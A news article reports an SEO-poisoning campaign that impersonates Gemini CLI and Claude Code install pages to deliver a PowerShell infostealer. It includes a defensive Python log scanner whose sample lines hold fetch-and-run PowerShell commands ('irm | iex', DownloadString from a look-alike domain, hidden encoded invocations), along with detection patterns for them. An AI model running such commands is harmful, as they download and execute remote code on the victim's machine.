SEO Poisoning Targets AI Platforms, Exposing Enterprises to Infostealer Threats

A recent campaign targeting AI coding tools like Gemini and Claude Code shows a troubling trend of SEO poisoning, exposing developers to infostealer malware and enterprise risks.

A new wave of cybercrime is exploiting the popularity of AI tools among software developers, with ongoing campaigns using search engine optimization (SEO) poisoning to impersonate platforms such as Gemini CLI and Claude Code. This tactic poses a direct supply chain risk as attackers target essential developer tools to compromise systems and steal sensitive information.

In early March 2026, analysts from EclecticIQ uncovered an active infostealer campaign aimed at users of these AI coding assistants. By manipulating search results, attackers present counterfeit domains that appear legitimate, leading developers to download malicious software disguised as genuine installations. This method not only spreads malware but also significantly raises the likelihood of successful attacks on enterprise networks.

The infostealer malware primarily targets Windows endpoints, using PowerShell to execute its operations entirely in memory. This stealthy approach allows the malware to harvest credentials and sensitive data from various applications without writing its payload to disk, which defeats file-based scanning. Once collected, the data is exfiltrated in an encrypted format to a command-and-control server operated by the attackers.

Beyond credential theft, the malware provides attackers with remote code execution access. This capability enables hands-on-keyboard intrusions, allowing for interactive control within compromised environments. Such access enables the exfiltration of critical assets, including OAuth tokens, CI/CD credentials, and corporate VPN details, further jeopardizing enterprise network integrity.

The rise of these impersonation campaigns highlights a concerning trend: financially motivated actors are increasingly capitalizing on the widespread adoption of AI technologies to distribute infostealer malware. Despite ongoing law enforcement efforts, such as Operation Magnus targeting specific malware infrastructures, the deployment of infostealers against enterprises is expected to grow. The combination of low operational costs for cybercriminals and a persistent demand for stolen credentials in underground markets fuels this trend.

The infection process often begins innocently. A developer searching for the official Gemini CLI or Claude Code installation page may be misled by a fake domain that ranks above legitimate sources in search results. Once the victim clicks on the counterfeit link, they encounter a malicious page designed to mimic the authentic vendor’s installation guide, prompting them to execute a command that unwittingly installs the infostealer.
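The delivery chain above (a copied install command that fetches remote content and runs it in PowerShell memory) is visible in script-block logging if that logging is enabled. The following is an added example, not code from the article or from EclecticIQ: it scans a handful of constructed log lines in a simplified event-4104 style and flags remote content piped into Invoke-Expression, hidden-window or encoded invocations, and downloads from hosts outside an approved list. The host names, user names, URLs and the approved-host set are all placeholders assumed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample log lines in a simplified PowerShell script-block (event 4104) layout.
# Hosts, users and URLs are invented for this example; none are indicators from the article.
SAMPLE_LOGS = [
    "4104 host=DEV-01 user=alice ScriptBlockText=irm https://install.example-vendor.test/cli.ps1 | iex",
    "4104 host=DEV-02 user=bob ScriptBlockText=iex (New-Object Net.WebClient).DownloadString('https://gemini-cli-setup.example/get.ps1')",
    "4104 host=DEV-03 user=carol ScriptBlockText=powershell -w hidden -enc SQBFAFgA",
    "4104 host=DEV-04 user=dave ScriptBlockText=Get-ChildItem C:\\src | Measure-Object",
]

# Assumption: the organisation's approved download hosts for developer tooling (placeholder).
ALLOWED_HOSTS = {"install.example-vendor.test"}

LOG_RE = re.compile(r"host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+ScriptBlockText=(?P<text>.*)")
INMEM_EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
REMOTE_FETCH = re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
OBFUSCATION = re.compile(r"(-enc\w*|-w(indowstyle)?\s+hidden|frombase64string)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def classify(line):
    """Return {'host', 'user', 'verdict', 'reasons'} for one script-block log line, or None if unparsable."""
    m = LOG_RE.search(line)
    if not m:
        return None
    text = m.group("text")
    reasons, alert = [], False
    # Fetch-and-run in one pipeline is the shape of the copy-paste install command.
    if INMEM_EXEC.search(text) and REMOTE_FETCH.search(text):
        reasons.append("remote content piped to in-memory execution")
    if OBFUSCATION.search(text):
        reasons.append("hidden window or encoded command")
        alert = True
    # An approved vendor host is 'review'; anything else serving the script is an alert.
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_HOSTS:
            reasons.append(f"download from unapproved host {host}")
            alert = True
    verdict = "alert" if alert else ("review" if reasons else "ok")
    return {"host": m.group("host"), "user": m.group("user"), "verdict": verdict, "reasons": reasons}


def scan(lines):
    """Return findings (verdict != 'ok') for a batch of log lines, in input order."""
    return [r for r in map(classify, lines) if r and r["verdict"] != "ok"]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f["verdict"].upper(), f["host"], f["user"], "; ".join(f["reasons"]))
```

The allowed-host check is the part that separates a legitimate vendor one-liner from a look-alike served by a poisoned search result, so it should be fed from the same source the organisation uses to approve tooling.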

Independent threat researcher @g0njxa was among the first to identify the Gemini CLI impersonation campaign, laying the groundwork for further analysis and understanding of this malicious infrastructure. The implications of such attacks extend beyond individual developers, posing significant risks to organizations that rely on these tools for software development.

As the threat landscape evolves, enterprises must remain vigilant against these sophisticated tactics. The growing prevalence of AI platforms in development workflows creates fertile ground for cybercriminals. Enhanced security measures, increased awareness, and solid incident response strategies will be essential in mitigating the risks posed by infostealer malware and protecting valuable corporate assets. With financial gain as a primary motivator, these cyber threats are unlikely to diminish soon, underscoring the need for ongoing vigilance against emerging challenges in cybersecurity.

GPUBeat Desk

GPUBeat Desk covers AI infrastructure — chips, foundation models, inference economics, datacenter buildouts, and the geopolitics of compute.